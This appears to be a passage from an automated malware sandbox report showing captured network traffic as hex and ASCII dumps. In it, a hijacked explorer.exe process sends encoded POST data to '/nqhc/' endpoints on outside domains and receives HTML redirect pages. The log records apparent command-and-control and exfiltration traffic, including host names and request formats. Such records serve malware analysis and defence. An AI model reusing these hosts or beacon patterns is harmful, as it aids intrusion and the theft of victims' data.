65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64 39 7a 49 69 35 4e 42 59 4d 47 37 67 66 67 41 79 69 77 3a 31 6f 78 42 55 32 3a 35 2d 61 65 6a 6e 69 4e 59 52 4f 67 4f 71 52 46 56 35 6e 42 44 72 35 41 4d 77 6b 2f 30 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 5f 6f 6e 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 74 6d 72 28 70 61 74 68 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5BIgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU2:5-aejniNYROgOqRFV5nBDr5AMwk/2" /> </noscript> <meta http-equiv="refresh" content="35;url=http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5BIgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU2:5-aejniNYROgOqRFV5nBDr5AMwk/0" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function tmr(path) { return function() { window.top.location.href = "http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5B
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073774099 CET2078INData Raw: 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64
                                                                                                                                                                                    Data Ascii: IgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU2:5-aejniNYROgOqRFV5nBDr5AMwk/" + path + "/"; } } var tmrR = setTimeout(tmr(3), 3000);
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073846102 CET2080INData Raw: 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 72 2e 73 6c 69 63 65 28 31 29 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67
                                                                                                                                                                                    Data Ascii: s.appendChild(document.createTextNode(r.slice(1))); document.getElementsByTagName("body")[0].appendChild(s); } } function print(msg) { document.getElementsByTagName("
                                                                                                                                                                                    Nov 21, 2022 19:25:30.074390888 CET2081INData Raw: 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66
                                                                                                                                                                                    Data Ascii: }; x.onload = function () { if (x.status === 200) { ar(x.responseText); } else { d(4);


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    89192.168.11.204991545.33.23.18380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:32.086532116 CET2082OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.labour-office.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.labour-office.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.labour-office.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 47 66 39 65 6d 56 74 59 77 50 4b 52 4d 65 72 59 58 50 75 69 7e 71 67 64 48 6d 38 32 62 4a 59 52 71 69 47 32 37 30 7e 44 36 74 4f 49 49 62 77 75 33 4b 4c 2d 37 4a 33 53 43 74 73 52 75 57 58 7a 68 4f 33 61 37 4d 31 61 47 38 38 67 31 41 75 6a 59 79 5a 7a 4c 41 6b 70 6a 69 58 72 78 4e 77 78 45 78 48 50 6c 5a 55 7a 32 4c 4c 74 68 59 53 73 5a 43 5a 52 42 63 51 4a 6c 2d 58 46 48 6a 34 45 59 62 55 6b 7a 68 36 75 71 76 67 43 41 58 70 71 35 65 76 63 55 53 74 63 38 32 39 41 41 7a 37 37 74 62 37 54 4c 54 4b 34 74 44 65 79 75 37 39 41 65 67 30 52 59 36 4e 56 67 52 4e 35 54 4f 6c 58 70 50 47 68 4c 4d 74 76 37 37 52 34 50 32 4b 34 61 4e 44 63 58 6d 39 56 6f 66 7e 67 33 47 4d 4c 6f 73 64 54 7e 70 70 6d 34 63 33 53 53 46 56 79 47 65 36 34 62 51 6e 48 67 62 4f 78 53 71 4f 55 70 34 39 46 72 36 70 2d 57 61 51 68 6e 5f 44 52 31 5f 44 48 75 71 69 72 6c 63 6b 4c 31 4e 61 37 4e 56 35 45 66 69 58 6d 35 41 7a 32 30 57 49 47 56 75 71 76 37 69 59 54 66 45 66 74 37 56 70 62 57 65 35 5f 63 59 6c 77 50 75 62 7a 4d 41 32 69 62 76 66 4e 4d 4b 34 74 38 6f 74 35 68 39 64 37 70 74 4d 6e 78 66 6e 4a 51 52 73 5a 6b 4f 42 6d 6d 4a 64 34 30 76 31 42 78 36 58 63 76 39 48 46 69 52 55 6f 39 43 48 32 46 49 7a 39 4b 75 4c 30 61 76 70 79 5a 31 36 69 4b 33 36 34 7e 30 64 32 6a 73 28 68 79 50 51 59 73 41 64 71 39 37 62 50 55 44 75 76 37 73 50 62 71 71 54 55 50 55 62 76 4b 69 6c 49 62 31 43 4f 76 47 71 4d 49 32 74 63 33 64 72 79 41 35 70 4c 57 53 52 7a 5a 5f 59 70 58 63 49 32 38 65 7e 76 52 52 6e 79 31 71 68 61 4b 78 33 52 65 30 64 51 4a 31 53 36 66 51 66 52 33 30 4d 4e 47 68 67 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=Gf9emVtYwPKRMerYXPui~qgdHm82bJYRqiG270~D6tOIIbwu3KL-7J3SCtsRuWXzhO3a7M1aG88g1AujYyZzLAkpjiXrxNwxExHPlZUz2LLthYSsZCZRBcQJl-XFHj4EYbUkzh6uqvgCAXpq5evcUStc829AAz77tb7TLTK4tDeyu79Aeg0RY6NVgRN5TOlXpPGhLMtv77R4P2K4aNDcXm9Vof~g3GMLosdT~ppm4c3SSFVyGe64bQnHgbOxSqOUp49Fr6p-WaQhn_DR1_DHuqirlckL1Na7NV5EfiXm5Az20WIGVuqv7iYTfEft7VpbWe5_cYlwPubzMA2ibvfNMK4t8ot5h9d7ptMnxfnJQRsZkOBmmJd40v1Bx6Xcv9HFiRUo9CH2FIz9KuL0avpyZ16iK364~0d2js(hyPQYsAdq97bPUDuv7sPbqqTUPUbvKilIb1COvGqMI2tc3dryA5pLWSRzZ_YpXcI28e~vRRny1qhaKx3Re0dQJ1S6fQfR30MNGhg.
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075741053 CET2083INHTTP/1.1 200 OK
                                                                                                                                                                                    server: openresty/1.13.6.1
                                                                                                                                                                                    date: Mon, 21 Nov 2022 18:25:33 GMT
                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                    content-length: 4529
                                                                                                                                                                                    vary: Accept-Language
                                                                                                                                                                                    content-language: en
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64 39 7a 49 69 35 4e 42 59 4d 47 37 67 66 67 41 79 69 77 3a 31 6f 78 42 55 35 3a 69 6f 49 79 61 57 72 5a 63 4f 6d 6a 75 5a 34 63 6b 43 5a 56 73 56 44 2d 58 61 63 2f 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64 39 7a 49 69 35 4e 42 59 4d 47 37 67 66 67 41 79 69 77 3a 31 6f 78 42 55 35 3a 69 6f 49 79 61 57 72 5a 63 4f 6d 6a 75 5a 34 63 6b 43 5a 56 73 56 44 2d 58 61 63 2f 30 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 5f 6f 6e 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 74 6d 72 28 70 61 74 68 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 62 6f 75 72 2d 6f 66 66 69 63 65 2e 63 6f 6d 2f 6d 74 6d 2f 64 69 72 65 63 74 2f 2e 65 4a 78 74 6a 44 6b 4f 67 44 41 4d 42 50 5f 69 4d 6f 4b 34 35 7a 4d 6f 57 41 35 42
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5BIgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU5:ioIyaWrZcOmjuZ4ckCZVsVD-Xac/2" /> </noscript> <meta http-equiv="refresh" content="35;url=http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5BIgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU5:ioIyaWrZcOmjuZ4ckCZVsVD-Xac/0" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function tmr(path) { return function() { window.top.location.href = "http://www.labour-office.com/mtm/direct/.eJxtjDkOgDAMBP_iMoK45zMoWA5B
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075831890 CET2085INData Raw: 49 67 64 4f 55 41 72 45 33 7a 45 4e 46 64 32 4f 4e 4c 4d 58 6e 4c 4c 42 42 4a 69 4f 51 41 67 44 4f 46 6d 72 73 69 35 68 7a 38 4b 69 45 46 6f 72 45 32 4c 76 33 65 35 75 79 61 65 4d 32 66 75 4e 32 46 4b 4f 58 78 68 79 62 58 4e 79 6b 54 58 34 4e 64
                                                                                                                                                                                    Data Ascii: IgdOUArE3zENFd2ONLMXnLLBBJiOQAgDOFmrsi5hz8KiEForE2Lv3e5uyaeM2fuN2FKOXxhybXNykTX4Nd9zIi5NBYMG7gfgAyiw:1oxBU5:ioIyaWrZcOmjuZ4ckCZVsVD-Xac/" + path + "/"; } } var tmrR = setTimeout(tmr(3), 3000);
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075901985 CET2086INData Raw: 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 72 2e 73 6c 69 63 65 28 31 29 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67
                                                                                                                                                                                    Data Ascii: s.appendChild(document.createTextNode(r.slice(1))); document.getElementsByTagName("body")[0].appendChild(s); } } function print(msg) { document.getElementsByTagName("
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076294899 CET2087INData Raw: 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66
                                                                                                                                                                                    Data Ascii: }; x.onload = function () { if (x.status === 200) { ar(x.responseText); } else { d(4);


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    9192.168.11.2049832154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:33.955990076 CET559OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.youlian.fund
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.youlian.fund
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 6e 34 57 6e 49 47 34 4a 6e 41 58 7a 31 77 35 44 51 34 6b 73 72 68 32 4d 43 38 48 4e 53 49 55 74 37 31 4f 31 74 52 4a 79 6c 72 45 42 5f 4d 41 62 35 41 6c 35 65 6f 57 42 4b 52 7a 46 30 32 6a 48 33 79 77 4a 78 65 59 6f 64 64 69 32 61 78 75 70 6c 72 53 4c 79 59 74 6a 79 35 74 62 68 54 44 38 65 37 59 78 38 4f 44 47 36 4e 32 5a 38 37 4e 68 37 43 5f 63 74 37 4b 64 2d 57 4e 56 31 72 6e 33 41 51 39 76 65 62 6a 57 34 4b 75 46 4d 52 30 33 58 30 32 6a 6a 47 62 45 6b 54 48 43 43 38 52 31 36 49 32 7e 71 7e 78 72 54 48 48 7a 79 58 78 6b 54 54 4e 74 73 76 73 6e 4b 56 77 70 57 46 70 51 44 74 56 63 43 6e 65 44 42 38 62 66 76 33 44 64 54 38 62 48 6b 78 36 71 65 4e 5f 59 4b 76 54 6b 58 6a 35 55 49 4d 4f 65 44 45 46 70 78 61 35 6f 58 73 79 7a 6f 6d 6e 70 49 71 39 4f 4f 31 41 34 37 75 69 71 57 54 78 6d 32 52 56 6c 42 54 5f 4a 6f 37 50 71 43 4a 30 49 56 6d 42 56 38 70 35 77 63 35 67 79 66 46 32 68 4e 50 65 67 61 43 57 79 67 59 70 32 48 55 53 6a 78 50 70 66 54 77 6d 74 59 4e 76 6e 38 55 7a 67 52 33 78 72 78 30 57 5a 32 68 77 79 4f 47 46 31 34 45 4b 77 53 42 4d 50 73 65 47 4b 50 31 30 42 72 45 78 59 68 48 66 67 63 54 4e 45 77 63 47 58 58 42 63 37 6e 7a 4c 68 62 57 79 46 48 51 44 33 65 37 6b 43 63 6c 4f 28 53 41 5a 6b 34 47 30 37 74 36 75 77 5f 50 4e 54 49 30 75 46 6d 37 4d 33 31 32 6d 58 30 28 42 58 6d 68 49 62 30 65 59 4f 55 54 46 4b 30 70 77 34 51 48 74 76 41 49 68 4a 44 30 6a 6f 74 68 33 32 50 73 48 54 39 79 66 54 65 54 71 78 6a 32 6b 69 30 4d 76 4b 7a 38 64 68 53 41 52 54 57 48 61 34 7a 78 47 70 48 55 58 7e 32 33 64 49 5a 46 58 59 6b 67 5a 48 42 49 77 4c 2d 39 58 56 30 6f 36 50 59 6c 31 64 53 58 6f 49 7a 56 62 5a 35 76 75 76 70 5a 61 52 64 4f 6e 43 67 59 42 49 49 51 37 38 54 4e 67 4a 6c 66 45 77 34 6e 44 71 42 49 33 43 41 65 6f 74 2d 71 51 65 42 66 37 72 42 42 6e 39 6a 56 33 43 57 61 71 32 49 78 6e 4e 6b 28 57 64 50 4b 33 47 5f 72 4a 58 44 47 47 4e 58 41 32 31 69 59 70 4b 68 61 4c 78 2d 5a 47 4d 44 38 6c 46 6f 76 6f 42 4a 28 61 37 56 6c 65 73 57 6b 6e 66 4f 71 33 79 68 63 4d 33 66 7a 5f 53 55 50 49 52 66 39 56 6e 59 65 55 79 52 4b 44 45 43 56 75 65 39 45 32 6c 39 4f 77 62 75 46 49 43 57 39 4e 4e 58 73 5f 48 6b 4c 2d 7a 33 49 32 64 32 6f 53 30 62 73 63 7a 2d 52 68 6d 6d 6a 66 72 51 68 41 52 49 41 47 51 64 46 6f 56 76 56 71 72 4c 67 49 47 4a 61 73 75 32 5a 4a 41 49 6c 56 28 6c 6c 49 53 70 6b 54 56 48 45 57 57 67 41 4e 69 37 66 68 54 6b 4c 74 41 58 76 32 30 72 65 66 59 50 4b 47 44 6c 4b 6b 31 4e 61 46 71 43 6a 70 6b 70 73 4b 66 74 6c 4f 6c 55 6f 5f 42 57 4c 5f 4b 4c 4d 65 6e 4f 7e 57 56 61 66 6f 4a 31 37 4f 39 75 72 38 30 73 49 5f 6d 7a 57 45 7a 7a 54 43 52 43 55 68 41 4e 30 33 71 4f 67 35 72 65 62 4b 43 35 74 78 77 69 36 4a 46 62 65 6a 4f 54 6d 4c 55 4c 4b 6c 48 53 50 74 7a 41 6a 42 65 70 66 45 36 4f 6f 76 28 54 33 57 67 42 48 47 35 74 43 4d 74 48 34 39 51 4b 6a 6c 66 34 61 56 52 38 4c 51 66 4f 45 6b 37 56 76 74 6f 45 63 67 51 7a 6a 46 70 55 4a 55 4c 35 42 76 36 67 75 69 45 4b 4c 74 55 48 42 71 56 6b 63 44 33 30 5a 75 35 56 38 6f 6a 69 79 69 7a 71 43 56 39 5f 7a 61 42 57 52 68 4c 54 58 53 6c 70 77 42 37 34 50 2d 70 43 55 55 31 4d 44 79 52 36 46 4f 79 65 4c 54 46 68 7a 55 70 62 4c 5a 62 51 69 2d 61 41 41 66 57 68 42 4d 43 47 56 65 72 7a 32 59 6a 33 52 47 28 33 51 4d 62 35 6b 30 55 73 58 52 56 6f 50 38 72 74 51 65 53 45 46 53 32 37 7a 77 77 55 77 44 45 36 7a 36 70 75 41 4a 6e 66 49 79 56 47 72 31 61 35 35 44 36 4d 28 59 42 46 49 37 50 66 6b 59 75 57 49 5a 36 4f 4a 73 69 31 66 62 33 72 4b 55 62 57 42 57 7e 58 6b 6a 77 69 6f 32 44 67 72 73 70 5f 72 32 69 54 7e 56 52 6e 41 37 6c 74 67 70 63 68 52 35 32 33 7a 38 56 66 35 53 66 43 41 47 4f 70 35 51 39 45 46 34 6d 67 32 4e 6d 41 30 31 6e 42 77 77 55 46 78 44 48 4b 35 66 55 63 51 48 41 62 33 2d 49 4e 78 62 4e 43 53 49 70 59 5a 46 6d 5f 57 36 35 55 4f 6e 53 54 55 6c 73 79 72 70 78 79 68 51 4c 4a 64 77 55 6f 41 35 6c 37 44 5f 59 57 6f 76 31 30 4e 77 5a 7a 65 4c 44 69 7a 4c 33 49 36 4c 53 6f 33 79 79 37 42 79 45 71 41 34 4b 53 4d 6a 4f 66 51 33 32 50 32 67 41 56 39 69 55 66 61 76 30 50 78 4b 63 6b 62 5a 76 51 50 53 58 52 38 44 4a 6e 30 5a 31
                                                                                                                                                                                    Data Ascii: r4txB=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSIUt71O1tRJylrEB_MAb5Al5eoWBKRzF02jH3ywJxeYoddi2axuplrSLyYtjy5tbhTD8e7Yx8ODG6N2Z87Nh7C_ct7Kd-WNV1rn3AQ9vebjW4KuFMR03X02jjGbEkTHCC8R16I2~q~xrTHHzyXxkTTNtsvsnKVwpWFpQDtVcCneDB8bfv3DdT8bHkx6qeN_YKvTkXj5UIMOeDEFpxa5oXsyzomnpIq9OO1A47uiqWTxm2RVlBT_Jo7PqCJ0IVmBV8p5wc5gyfF2hNPegaCWygYp2HUSjxPpfTwmtYNvn8UzgR3xrx0WZ2hwyOGF14EKwSBMPseGKP10BrExYhHfgcTNEwcGXXBc7nzLhbWyFHQD3e7kCclO(SAZk4G07t6uw_PNTI0uFm7M312mX0(BXmhIb0eYOUTFK0pw4QHtvAIhJD0joth32PsHT9yfTeTqxj2ki0MvKz8dhSARTWHa4zxGpHUX~23dIZFXYkgZHBIwL-9XV0o6PYl1dSXoIzVbZ5vuvpZaRdOnCgYBIIQ78TNgJlfEw4nDqBI3CAeot-qQeBf7rBBn9jV3CWaq2IxnNk(WdPK3G_rJXDGGNXA21iYpKhaLx-ZGMD8lFovoBJ(a7VlesWknfOq3yhcM3fz_SUPIRf9VnYeUyRKDECVue9E2l9OwbuFICW9NNXs_HkL-z3I2d2oS0bscz-RhmmjfrQhARIAGQdFoVvVqrLgIGJasu2ZJAIlV(llISpkTVHEWWgANi7fhTkLtAXv20refYPKGDlKk1NaFqCjpkpsKftlOlUo_BWL_KLMenO~WVafoJ17O9ur80sI_mzWEzzTCRCUhAN03qOg5rebKC5txwi6JFbejOTmLULKlHSPtzAjBepfE6Oov(T3WgBHG5tCMtH49QKjlf4aVR8LQfOEk7VvtoEcgQzjFpUJUL5Bv6guiEKLtUHBqVkcD30Zu5V8ojiyizqCV9_zaBWRhLTXSlpwB74P-pCUU1MDyR6FOyeLTFhzUpbLZbQi-aAAfWhBMCGVerz2Yj3RG(3QMb5k0UsXRVoP8rtQeSEFS27zwwUwDE6z6puAJnfIyVGr1a55D6M(YBFI7PfkYuWIZ6OJsi1fb3rKUbWBW~Xkjwio2Dgrsp_r2iT~VRnA7ltgpchR523z8Vf5SfCAGOp5Q9EF4mg2NmA01nBwwUFxDHK5fUcQHAb3-INxbNCSIpYZFm_W65UOnSTUlsyrpxyhQLJdwUoA5l7D_YWov10NwZzeLDizL3I6LSo3yy7ByEqA4KSMjOfQ32P2gAV9iUfav0PxKckbZvQPSXR8DJn0Z1_fX8mXhX5nCY559ZaIsJn7ce5(mbM5eJlVMSFQWqYIh1WSlmuUjit2bPaFoO_ncEoczRiGlNcVZ2DwFDm7IirRvgAPRaHRZuHrfd3hb8F5rYCYCckcKL8Ieezo22AHsUhYgWTy6x4(k47HFVnYI4CLE~y5tDY3PyNGGpvZzqZ32J9QzVPCIuOh4F2f3H3SQ62hIxQymbPyeWv0-qY4WNU5Ek64XUot7Ekxebjxfynp2JviHp2ZJk1c8soRufoD5QRxQB6Ec23UfdaH8L9gjAYr7TXdp35WcSFIOHnT35Y7bJ4mrO6AeK23Wm6xXIfTPeLPA76ZqNKc25eu4TnbS(u9uALKTEe2X4hco~oBrpvSqC6qdvsyDVbGNHe473EnDFXut4N7dL8pg8yXUcqdyoRSJDJ7CrdU5gqNk7vGd1awRaEFzxshbNDlYhzXaeDFq1Y7kg648eqvM58L1r1iK5x0fe3mZGrXUUqrqG1G7fxJjUQcVoTpaZMhb3pBB1yq1Dwzl(kg0sOeshIs1Pm0jHgGHPb7Ot579xxiT14FdOSmKq-(2bPoLfVHv4_~DLzo6hoUAB8xAAhGNzQxcGJxHKAcfoKPyL5pkUndp1ULZXc9FRAIXkLveHxws5f1sr-1A8DOLuFdAm2u1tfhuoXQNM6Bjcr2A4_pkkuXuwcA7wb5A8ohO6C~y6_0byEVXejiMs7BXP8T0U9~vA8wxXt1d6gpXiPnHwH0O1qg7ArlFNUzFyDCi1etthi(9VgUmJuIBSRSPjH(qTTV6BmtH9A3HE_yttbiY4tdzNt(HoQGLXxd1h